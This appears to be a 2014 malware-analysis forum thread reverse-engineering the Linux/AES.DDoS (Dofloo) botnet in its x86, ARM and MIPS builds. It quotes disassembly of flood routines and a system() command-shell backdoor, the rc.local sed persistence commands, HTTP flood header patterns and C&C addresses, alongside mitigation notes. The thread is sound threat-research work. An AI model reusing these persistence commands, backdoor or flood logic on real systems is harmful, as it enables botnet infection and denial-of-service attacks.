Linux/AES.DDoS (alias Dofloo, MrBlack)

Forum for analysis and discussion about malware.

Linux/AES.DDoS (alias Dofloo, MrBlack)

Postby unixfreaxjp » Fri Sep 12, 2014 12:37 am

The malware is not Elknot, IptabLesx or Billgates, is using AES to decrypt the target & CNC data, and contains 13 flooders (they added these one by one..so the next variant maybe more..). Originated from China, with the spreading method via ssh hacking. The malware firstly spotted few times in mid 2014. This sample is not the first sample/new one.

This sample was served in the panel below, noted: just being released sample:
Image

Some notes:

Flood mitigation can be applied to filter this specific header: (reff: .rodata:0x080ED38F && .rodata:0x080ED474)
Code: Select all
Accept-Language: zh-cn
Accept-Language: zh-CN

Autostart installation:
Code: Select all
sed -i -e '/%s/d' /etc/rc.local                                 
sed -i -e '2 i%s/%s' /etc/rc.local                             
sed -i -e '2 i%s/%s start' /etc/rc.d/rc.local                   
sed -i -e '2 i%s/%s start' /etc/init.d/boot.local 

Source files (unstripped)
Code: Select all
File : 'crtstuff.c'
File : 'AES.cpp'
File : 'main.cpp'
File : 'eh_personality.cc'
File : 'eh_alloc.cc'
File : 'eh_exception.cc'
File : 'eh_call.cc'
File : 'pure.cc'
File : 'eh_globals.cc'
File : 'del_op.cc'
File : 'eh_catch.cc'
File : 'class_type_info.cc'
File : 'allocator-inst.cc'
File : 'string-inst.cc'
File : 'eh_terminate.cc'
File : 'eh_term_handler.cc'
File : 'si_class_type_info.cc'
File : 'eh_throw.cc'
File : 'eh_unex_handler.cc'
File : 'vterminate.cc'
File : 'tinfo.cc'
File : 'new_op.cc'
File : 'eh_type.cc'
File : 'cp-demangle.c'
File : 'functexcept.cc'
File : 'regex.cc'
File : 'system_error.cc'
File : 'functional.cc'
File : 'future.cc'
File : 'new_handler.cc'
File : 'bad_typeid.cc'
File : 'bad_alloc.cc'
File : 'eh_ptr.cc'
File : 'guard.cc'
File : 'guard_error.cc'
File : 'bad_cast.cc'
File : 'ios_failure.cc'
File : 'stdexcept.cc'
File : 'condition_variable.cc'
File : 'mutex.cc'
File : 'thread.cc'
File : 'unwind-dw2.c'
File : 'unwind-dw2-fde-dip.c'
File : 'libgcc2.c'
File : 'unwind-c.c'

Some PoC of AES:
Code: Select all
.text:0804832C ; AES::AES(unsigned char *)
.text:0804832C  public _ZN3AESC2EPh
   ;;
.text:0804883E ; AES::KeyExpansion(unsigned char *, unsigned char (*)[4][4])
.text:0804883E   public _ZN3AES12KeyExpansionEPhPA4_A4_h
  ;;

DDoS' (13 of them) functions: SYN_Flood, LSYN_Flood, UDP_Flood, TCP_Flood, DNS_Flood1, DNS_Flood2, DNS_Flood3, DNS_Flood4, CC_Flood, CC2_Flood, CC3_Flood, UDPS_Flood, UDP_Flood
Code: Select all
;; DDOS 1

0x0804EE62:
mov     eax, [ebp+arg_0]
mov     eax, [eax+18Ch]
cmp     eax, 28h
jg      short 0x0804EE9D
mov     eax, [ebp+var_C]
shl     eax, 2
lea     edx, id[eax]
mov     eax, [ebp+arg_0]
mov     [esp+0Ch], eax
mov     dword ptr [esp+8], offset _Z9SYN_FloodPv ; SYN_Flood(void *)
mov     dword ptr [esp+4], 0
mov     [esp], edx
call    pthread_create
jmp     short 0x0804EEC8

;; DDOS 2

0x0804EE9D:
mov     eax, [ebp+var_C]
shl     eax, 2
lea     edx, id[eax]
mov     eax, [ebp+arg_0]
mov     [esp+0Ch], eax
mov     dword ptr [esp+8], offset _Z10LSYN_FloodPv ; LSYN_Flood(void *)
mov     dword ptr [esp+4], 0
mov     [esp], edx
call    pthread_create

;; DDOS 3

0x0804EEED:
mov     eax, [ebp+var_C]
shl     eax, 2
lea     edx, id[eax]
mov     eax, [ebp+arg_0]
mov     [esp+0Ch], eax
mov     dword ptr [esp+8], offset _Z9UDP_FloodPv ; UDP_Flood(void *)
mov     dword ptr [esp+4], 0
mov     [esp], edx
call    pthread_create
add     [ebp+var_C], 1

;; DDOS 4

0x0804EF3D:
mov     eax, [ebp+var_C]
shl     eax, 2
lea     edx, id[eax]
mov     eax, [ebp+arg_0]
mov     [esp+0Ch], eax
mov     dword ptr [esp+8], offset _Z9TCP_FloodPv ; TCP_Flood(void *)
mov     dword ptr [esp+4], 0
mov     [esp], edx
call    pthread_create
add     [ebp+var_C], 1

;; DDOS 5

0x0804EF8D:
mov     eax, [ebp+var_C]
shl     eax, 2
lea     edx, id[eax]
mov     eax, [ebp+arg_0]
mov     [esp+0Ch], eax
mov     dword ptr [esp+8], offset _Z10DNS_Flood1Pv ; DNS_Flood1(void *)
mov     dword ptr [esp+4], 0
mov     [esp], edx
call    pthread_create
add     [ebp+var_C], 1

;; DDOS 6

0x0804EFDD:
mov     eax, [ebp+var_C]
shl     eax, 2
lea     edx, id[eax]
mov     eax, [ebp+arg_0]
mov     [esp+0Ch], eax
mov     dword ptr [esp+8], offset _Z10DNS_Flood2Pv ; DNS_Flood2(void *)
mov     dword ptr [esp+4], 0
mov     [esp], edx
call    pthread_create
add     [ebp+var_C], 1

;; DDOS 7

0x0804F02D:
mov     eax, [ebp+var_C]
shl     eax, 2
lea     edx, id[eax]
mov     eax, [ebp+arg_0]
mov     [esp+0Ch], eax
mov     dword ptr [esp+8], offset _Z10DNS_Flood3Pv ; DNS_Flood3(void *)
mov     dword ptr [esp+4], 0
mov     [esp], edx
call    pthread_create
add     [ebp+var_C], 1

;; DDOS 8

0x0804F07D:
mov     eax, [ebp+var_C]
shl     eax, 2
lea     edx, id[eax]
mov     eax, [ebp+arg_0]
mov     [esp+0Ch], eax
mov     dword ptr [esp+8], offset _Z10DNS_Flood4Pv ; DNS_Flood4(void *)
mov     dword ptr [esp+4], 0
mov     [esp], edx
call    pthread_create
add     [ebp+var_C], 1

;; DDOS 9

0x0804F0CD:
mov     eax, [ebp+var_C]
shl     eax, 2
lea     edx, id[eax]
mov     eax, [ebp+arg_0]
mov     [esp+0Ch], eax
mov     dword ptr [esp+8], offset _Z8CC_FloodPv ; CC_Flood(void *)
mov     dword ptr [esp+4], 0
mov     [esp], edx
call    pthread_create
add     [ebp+var_C], 1

;; DDOS 10

0x0804F11D:
mov     eax, [ebp+var_C]
shl     eax, 2
lea     edx, id[eax]
mov     eax, [ebp+arg_0]
mov     [esp+0Ch], eax
mov     dword ptr [esp+8], offset _Z9CC2_FloodPv ; CC2_Flood(void *)
mov     dword ptr [esp+4], 0
mov     [esp], edx
call    pthread_create
add     [ebp+var_C], 1

;; DDOS 11

0x0804F16D:
mov     eax, [ebp+var_C]
shl     eax, 2
lea     edx, id[eax]
mov     eax, [ebp+arg_0]
mov     [esp+0Ch], eax
mov     dword ptr [esp+8], offset _Z9CC3_FloodPv ; CC3_Flood(void *)
mov     dword ptr [esp+4], 0
mov     [esp], edx
call    pthread_create
add     [ebp+var_C], 1

;; DDOS 12

0x0804F1BD:
mov     eax, [ebp+var_C]
shl     eax, 2
lea     edx, id[eax]
mov     eax, [ebp+arg_0]
mov     [esp+0Ch], eax
mov     dword ptr [esp+8], offset _Z10UDPS_FloodPv ; UDPS_Flood(void *)
mov     dword ptr [esp+4], 0
mov     [esp], edx
call    pthread_create
add     [ebp+var_C], 1

;; DDOS 13

0x0804F20A:
mov     eax, [ebp+var_C]
shl     eax, 2
lea     edx, id[eax]
mov     eax, [ebp+arg_0]
mov     [esp+0Ch], eax
mov     dword ptr [esp+8], offset _Z9UDP_FloodPv ; UDP_Flood(void *)
mov     dword ptr [esp+4], 0
mov     [esp], edx
call    pthread_create
add     [ebp+var_C], 1

System command interface for execution.. this is bad...hacked server can be used as RAT
Code: Select all
.text:0x0804E6C2 ; Cmdshell(_MSGHEAD *)
.text:0x0804E6C2 public _Z8CmdshellP8_MSGHEAD
.text:0x0804E6C2 _Z8CmdshellP8_MSGHEAD proc near
.text:0x0804E6C2
.text:0x0804E6C2 arg_0= dword ptr  8
.text:0x0804E6C2
.text:0x0804E6C2 push    ebp
.text:0x0804E6C3 mov     ebp, esp
.text:0x0804E6C5 sub     esp, 18h
.text:0x0804E6C8 mov     eax, [ebp+arg_0]
.text:0x0804E6CB add     eax, 100h
.text:0x0804E6D0 mov     [esp], eax
.text:0x0804E6D3 call    system
.text:0x0804E6D8 leave
.text:0x0804E6D9 retn
.text:0x0804E6D9 _Z8CmdshellP8_MSGHEAD endp
.text:0x0804E6D9

We can expect CPU info with below format will be sent to remote:
Code: Select all
        :`
.text:0x080509E2 lea     eax, [ebp+var_1110]
.text:0x080509E8 add     eax, 68h
.text:0x080509EB mov     [esp+4], eax
.text:0x080509EF lea     eax, [ebp+var_1110]
.text:0x080509F5 add     eax, 64h
.text:0x080509F8 mov     [esp], eax
.text:0x080509FB call    _Z10GetCpuInfoPjS_ ; GetCpuInfo(uint *,uint *)
.text:0x08050A00 lea     eax, [ebp+var_11D0]
.text:0x08050A06 mov     [esp], eax
.text:0x08050A09 call    sysinfo
.text:0x08050A0E mov     [ebp+var_24], eax
.text:0x08050A11 mov     eax, [ebp+var_11C0]
.text:0x08050A17 shr     eax, 14h
.text:0x08050A1A mov     [ebp+var_10A4], eax
.text:0x08050A20 mov     edx, [ebp+var_11C0]
.text:0x08050A26 mov     eax, [ebp+var_11BC]
.text:0x08050A2C mov     ecx, edx
.text:0x08050A2E sub     ecx, eax
.text:0x08050A30 mov     eax, ecx
.text:0x08050A32 shr     eax, 14h
.text:0x08050A35 mov     [ebp+var_10A0], eax
.text:0x08050A3B lea     ebx, [ebp+var_43C]
.text:0x08050A41 mov     eax, 0
.text:0x08050A46 mov     edx, 100h
.text:0x08050A4B mov     edi, ebx
.text:0x08050A4D mov     ecx, edx
.text:0x08050A4F rep stosd
.text:0x08050A51 mov     ebx, [ebp+var_10A0]
.text:0x08050A57 mov     ecx, [ebp+var_10A4]
.text:0x08050A5D mov     edx, [ebp+var_10A8]
.text:0x08050A63 mov     eax, [ebp+var_10AC]
.text:0x08050A69 mov     dword ptr [esp+20h], offset aHacker ; "Hacker"
.text:0x08050A71 mov     [esp+1Ch], ebx
.text:0x08050A75 mov     [esp+18h], ecx
.text:0x08050A79 mov     [esp+14h], edx
.text:0x08050A7D mov     [esp+10h], eax
.text:0x08050A81 lea     eax, [ebp+var_1110]
.text:0x08050A87 mov     [esp+0Ch], eax
.text:0x08050A8B mov     dword ptr [esp+8], offset aVersonexLinuxS ; "VERSONEX:Linux-%s|%d|%d MHz|%dMB|%dMB|%"...
.text:0x08050A93 mov     dword ptr [esp+4], 400h
.text:0x08050A9B lea     eax, [ebp+var_43C]
.text:0x08050AA1 mov     [esp], eax
.text:0x08050AA4 call    snprintf
.text:0x08050AA9 mov     eax, ds:MainSocket
.text:0x08050AAE test    eax, eax

CNC:
Code: Select all
sin_port=htons(48080), sin_addr=inet_addr("119.147.145.215")
Loc:
119.147.145.215||4134 | 119.144.0.0/14 | CHINANET | CN | CHINATELECOM.COM.CN | CHINANET GUANGDONG PROVINCE NETWORK
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/Elknot (DDoS botnet, alias DnsAmp) ARM version

Postby unixfreaxjp » Sat Sep 13, 2014 5:49 am

The ARM version with so many specific modification I reversed and reported in here: http://blog.malwaremustdie.org/2014/09/ ... lknot.html < we need wider awareness for this threat since it is aiming the router devices and that is really not a good news, since routers are the biggest volume in device that is always online in internet, every house that is using DSL to connect internet is using router and ARM architecture is maybe has more than 40% shares of this segment, so pls do the math and let's imagine what if this segment is really targeted to be used as DDoS bot army?

The samples I uploaded in VT as below with the null detection ratio.
original: https://www.virustotal.com/en/file/7710 ... 410571540/
unpacked: https://www.virustotal.com/en/file/dacc ... 410525799/
For the AV & filtration industry, you should consider to raise this detection.
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/AES.DDoS (MIPS arc Version)

Postby unixfreaxjp » Sun Sep 14, 2014 10:31 am

MIPS Version of this variant was found. Compile date: in Aug 2014.
https://www.virustotal.com/en/file/276b ... 410687960/
Code: Select all
linux-mips: ELF 32-bit LSB executable, MIPS, MIPS32 rel2 version 1, statically linked, for GNU/Linux 2.6.16, with unknown capability 0xf41 = 0x756e6700, with unknown capability 0x70100 = 0x1040000, not stripped

Malware was uploaded for infection, total download detected so far: 1,394 times, PoC:
Image

Installation:
Code: Select all
sed -i -e '/exit/d' /etc/rc.local
sed -i -e '/
$/d' /etc/rc.local
sed -i -e '/%s/d' /etc/rc.local
sed -i -e '2 i%s/%s' /etc/rc.local
sed -i -e '2 i%s/%s start' /etc/rc.d/rc.local
sed -i -e '2 i%s/%s start' /etc/init.d/boot.local

(Cross)Compiled by codesourcery
Code: Select all
0x00C0FD4   GCC: (Sourcery CodeBench 2014.05-6) 4.8.3 20140320 (prerelease)
0x00CD3F2   ../ports/sysdeps/mips/mips32/crti.S
0x00CD416   /opt/codesourcery/mips-linux-gnu/src/glibc/csu
0x00CD445   GNU AS 2.24.51
0x00D8EA8   /opt/codesourcery/mips-linux-gnu/src/gcc/libgcc/config/mips
0x00D8EE4   /opt/codesourcery/mips-linux-gnu/src/generated/gcc/gcc/include
0x00D8F5A   /opt/codesourcery/mips-linux-gnu/libc/usr/include
0x00D8FC2   /opt/codesourcery/mips-linux-gnu/src/gcc/libgcc/../include

DDoS Attacks (4 types)
Code: Select all
TCP_Flood(void *) 0x403EA4 // HTTP
CC_Flood(void *)  0x404914
CC2_Flood(void *) 0x405194
CC3_Flood(void *) 0x405A24

Backdoor
Code: Select all
.text:0x40761C _Z8CmdshellP8_MSGHEAD:
.text:0x40761C
.text:0x40761C var_8= -8
.text:0x40761C var_4= -4
.text:0x40761C arg_0=  0
.text:0x40761C
.text:0x40761C addiu   $sp, -0x20
.text:0x407620 sw      $ra, 0x20+var_4($sp)
.text:0x407624 sw      $fp, 0x20+var_8($sp)
.text:0x407628 move    $fp, $sp
.text:0x40762C sw      $a0, 0x20+arg_0($fp)
.text:0x407630 lw      $v0, 0x20+arg_0($fp)
.text:0x407634 addiu   $v0, 0x100
.text:0x407638 move    $a0, $v0
.text:0x40763C jal     system
.text:0x407640 nop
.text:0x407644 move    $sp, $fp
.text:0x407648 lw      $ra, 0x20+var_4($sp)
.text:0x40764C lw      $fp, 0x20+var_8($sp)
.text:0x407650 addiu   $sp, 0x20
.text:0x407654 jr      $ra
.text:0x407658 nop

AES Crypt used PoC:
Code: Select all
0x010B444   AES.cpp
0x00A0838   3AES
0x0111173   _ZN3AESC2EPh
0x0111A70   _ZN3AES9InvCipherEPvi
0x0111BD8   _ZN3AESD2Ev
0x0111FDC   _ZN3AESC1EPh
0x0112002   _ZTI3AES
0x011254D   _ZN3AES11InvSubBytesEPA4_h
0x0113CB2   _ZN3AES5FFmulEhh
0x01143C5   _ZN3AES13InvMixColumnsEPA4_h
0x01154CB   _ZN3AES8SubBytesEPA4_h
0x01159E1   _ZN3AESD1Ev
0x0115B55   _ZN3AES10MixColumnsEPA4_h
0x0116013   _ZN3AES9ShiftRowsEPA4_h
0x0116332   _ZN3AES12InvShiftRowsEPA4_h
0x011646A   _ZN3AESD0Ev
0x01164F3   _ZTV3AES
0x0116895   _ZN3AES9InvCipherEPh
0x01168AA   _ZN3AES11AddRoundKeyEPA4_hS1_
0x0116A69   _ZN3AES6CipherEPvi
0x011776C   _ZN3AES12KeyExpansionEPhPA4_A4_h
0x011880D   _ZTS3AES
0x0118F04   _ZN3AES6CipherEPh

2 patterns used for HTTP flood ( CC, CC2 and CC3 Attacks) used (UserAgent), noted Accept-Language header:
Code: Select all
0x00A08B4   Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
0x00A0964   Accept-Language: zh-cn
0x00A0980   Accept-Encoding: gzip, deflate
0x00A09A2   User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
0x00A09FA   Host:
0x00A0A02   Connection: Keep-Alive
(...)
0x00A0A24   Accept: text/html, application/xhtml+xml, */*
0x00A0A54   Accept-Language: zh-CN
0x00A0A70   User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
0x00A0AC8   Accept-Encoding: gzip, deflate
0x00A0AEC   Host:
0x00A0AF6   Connection: Keep-Alive
0x00A0B10   Pragma: no-cache

DDoS PoC (took one function only..)
Code: Select all
0x404914  # CC_Flood(void *)
0x404914 .globl _Z8CC_FloodPv
0x404914 _Z8CC_FloodPv:
(...)
0x404C90 addiu   $a1, $v1, (aGet - 0x4A0000)  # "GET "
0x404C94 move    $a2, $v0
0x404C98 jal     _ZStplIcSt11char_traitsIcESaIcEESbIT_T0_T1_EPKS3_RKS6_
0x404C9C nop
0x404CA0 addiu   $v1, $fp, 0x250+var_220
0x404CA4 addiu   $v0, $fp, 0x250+var_224
0x404CA8 move    $a0, $v1
0x404CAC move    $a1, $v0
0x404CB0 lui     $v0, 0x4A
0x404CB4 addiu   $a2, $v0, (aHttp1_1 - 0x4A0000)  # " HTTP/1.1\r\n"
0x404CB8 jal     _ZStplIcSt11char_traitsIcESaIcEESbIT_T0_T1_ERKS6_PKS3_
0x404CBC nop
... etc etc..blah..
*) I may add more details later..
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/AES.DDoS

Postby unixfreaxjp » Sun Sep 21, 2014 10:56 am

Found this ELF MIPS architecture sample in MIPS hacked router https://www.virustotal.com/en/file/be7e ... 411296377/
Some analysis PoC :
Code: Select all
// AES

AES::AES(uchar *)                     0x0402470
AES::~AES()                           0x0402554
AES::~AES()                           0x04025A8
AES::Cipher(uchar *)                  0x04025EC
AES::InvCipher(uchar *)               0x04027F8
AES::Cipher(void *,int)               0x04029FC
AES::InvCipher(void *,int)            0x0402AC4
AES::KeyExpansion(uchar *,uchar (*)[4][4])      0x0402B4C
AES::FFmul(uchar,uchar)               0x0402E8C
AES::SubBytes(uchar (*)[4])           0x0402FCC
AES::ShiftRows(uchar (*)[4])          0x0403088
AES::MixColumns(uchar (*)[4])         0x04031A0
AES::AddRoundKey(uchar (*)[4],uchar (*)[4])     0x0403394
AES::InvSubBytes(uchar (*)[4])        0x040346C
AES::InvShiftRows(uchar (*)[4])       0x0403528
AES::InvMixColumns(uchar (*)[4])      0x0403644

// Attacks

TCP_Flood(void *)                     0x0403EA4 P
CC_Flood(void *)                      0x0404914 P
CC2_Flood(void *)                     0x0405194 P
CC3_Flood(void *)                     0x0405A24 P

// Backdoor:

backdoorA(void *)                     0x040A694 P
backdoorM(void *)                     0x040A73C P

0x040A758 jal     _Z15_ConnectServerMv
0x040A75C nop
0x040A760 lw      $v0, pid
0x040A768 beqz    $v0, loc_40A7B0
0x040A76C nop


// Autostart:

0x040B058 addiu   $v0, $fp, 0x188+var_70
0x040B05C move    $a0, $v0
0x040B060 lui     $v0, 0x4A
0x040B064 addiu   $a1, $v0, (aSedIESDEtcRc_l - 0x4A0000)  # "sed -i -e '/%s/d' /etc/rc.local"
0x040B068 lw      $a2, 0x188+arg_0($fp)
0x040B06C jal     sprintf
0x040B070 nop
0x040B074 addiu   $v0, $fp, 0x188+var_70
0x040B078 move    $a0, $v0
0x040B07C jal     system
0x040B080 nop
0x040B084 addiu   $v0, $fp, 0x188+var_70
0x040B088 move    $a0, $v0
0x040B08C lui     $v0, 0x4A
0x040B090 addiu   $a1, $v0, (aSedIE2ISSEtcRc - 0x4A0000)  # "sed -i -e '2 i%s/%s' /etc/rc.local"
0x040B094 addiu   $v0, $fp, 0x188+var_170
0x040B098 move    $a2, $v0
0x040B09C lw      $a3, 0x188+arg_0($fp)
0x040B0A0 jal     sprintf
0x040B0A4 nop
0x040B0A8 addiu   $v0, $fp, 0x188+var_70
0x040B0AC move    $a0, $v0
0x040B0B0 jal     system
0x040B0B4 nop
0x040B0B8 addiu   $v0, $fp, 0x188+var_70
0x040B0BC move    $a0, $v0
0x040B0C0 lui     $v0, 0x4A
0x040B0C4 addiu   $a1, $v0, (aSedIE2ISSStart - 0x4A0000)  # "sed -i -e '2 i%s/%s start' /etc/rc.d/rc"...
0x040B0C8 addiu   $v0, $fp, 0x188+var_170
0x040B0CC move    $a2, $v0
0x040B0D0 lw      $a3, 0x188+arg_0($fp)
0x040B0D4 jal     sprintf
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/AES.DDoS

Postby unixfreaxjp » Sun Sep 21, 2014 11:15 am

Intel x32 of the AES.DDoS: https://www.virustotal.com/en/file/6ca3 ... 411297424/
CNC: 183.60.149.208:48080
Attacks:
Code: Select all
DNS_Flood1(void *)
DNS_Flood2(void *)
DNS_Flood3(void *)
DNS_Flood4(void *)
SYN_Flood(void *)
LSYN_Flood(void *)
UDP_Flood(void *)
UDPS_Flood(void *)
TCP_Flood(void *)
CC_Flood(void *)
CC2_Flood(void *)
CC3_Flood(void *)
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/AES.DDoS

Postby unixfreaxjp » Sun Sep 21, 2014 12:39 pm

This one is the ARM version https://www.virustotal.com/en/file/af76 ... /analysis/
Just like the MIPS version and unlike the Intel version, the attack is limited into:
Code: Select all
TCP_Flood(void *)
CC_Flood(void *)
CC2_Flood(void *)
CC3_Flood(void *)
Some installation script used:
Code: Select all
sed -i -e '/exit/d' /etc/rc.local     
sed -i -e '/^\r\n|\r|\n$/d' /etc/rc.local   
sed -i -e '/%s/d' /etc/rc.local
sed -i -e '2 i%s/%s' /etc/rc.local   
sed -i -e '2 i%s/%s start' /etc/rc.d/rc.local     
sed -i -e '2 i%s/%s start' /etc/init.d/boot.local
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/AES.DDoS

Postby unixfreaxjp » Sun Sep 21, 2014 12:43 pm

For mitigation purpose below are the pics described the ways to filter the Linux/AES.DDoS CNC initial connection:
https://lh6.googleusercontent.com/-BSh3 ... 76/008.png
https://lh6.googleusercontent.com/-AJ87 ... 20/009.png
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/AES.DDoS

Postby unixfreaxjp » Tue Sep 23, 2014 8:20 pm

New ELF binary 32, plain: https://www.virustotal.com/en/file/dbb8 ... 411503086/ ZERO detection.
CNC & drops (characteristic) PoC
Code: Select all
offset aEtc_mysys ; "/etc/.mysys"
offset a183_60_205_183 ; "183.60.205.183"

Still trying to convince itself as Windows Service :lol:
Code: Select all
.data:0810610C      0x00E C WinHelp32.exe
.data:0810612C      0x00A C WinHelp32   
.data:08106190      0x012 C WinHelp32 Service   
.data:081061F4      0x028 C WinHelp32 Remote Control Tool's Service   

It's the x32 ver of the ARM (router) ver I posted here: http://blog.malwaremustdie.org/2014/09/ ... lknot.html
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/AES.DDoS

Postby unixfreaxjp » Tue Sep 23, 2014 10:22 pm

The China crook was releasing ARM binary: https://www.virustotal.com/en/file/4ccd ... 411510591/ < FUD, packed
This time they fake this windows service :D
Code: Select all
 WinHelp32.exe   
 WinHelp32   
 Windows Help System   
 Windows Help System for X32 windows desktop

CNC is in 183.60.205.183
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/AES.DDoS (no AES, atk: only DNS Amp)

Postby unixfreaxjp » Sun Oct 05, 2014 9:22 am

New panel with a variant of AES.DDoS found:
Image
Code: Select all
dos64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV),
dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
Thi sis a light weight built, no HTTP flood, and they didn't use AES at all, but the "usual" sign in coding sshows this variant, more over the AES series found in the same panel sources too..gotta post it one per one..
https://www.virustotal.com/en/file/418f ... 412500424/
Code: Select all
CNC: 222.186.34.152:8998 (ip base)
ASN: 23650 | 222.186.34.0/23 | CHINANET-JS-AS | CN | CHINATELECOM.COM.CN | CHINANET JIANGSU PROVINCE NETWORK

thx @wirehack
You do not have the required permissions to view the files attached to this post.
Last edited by unixfreaxjp on Sun Oct 05, 2014 11:29 am, edited 1 time in total.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Next

Return to Malware

Who is online

Users browsing this forum: No registered users and 7 guests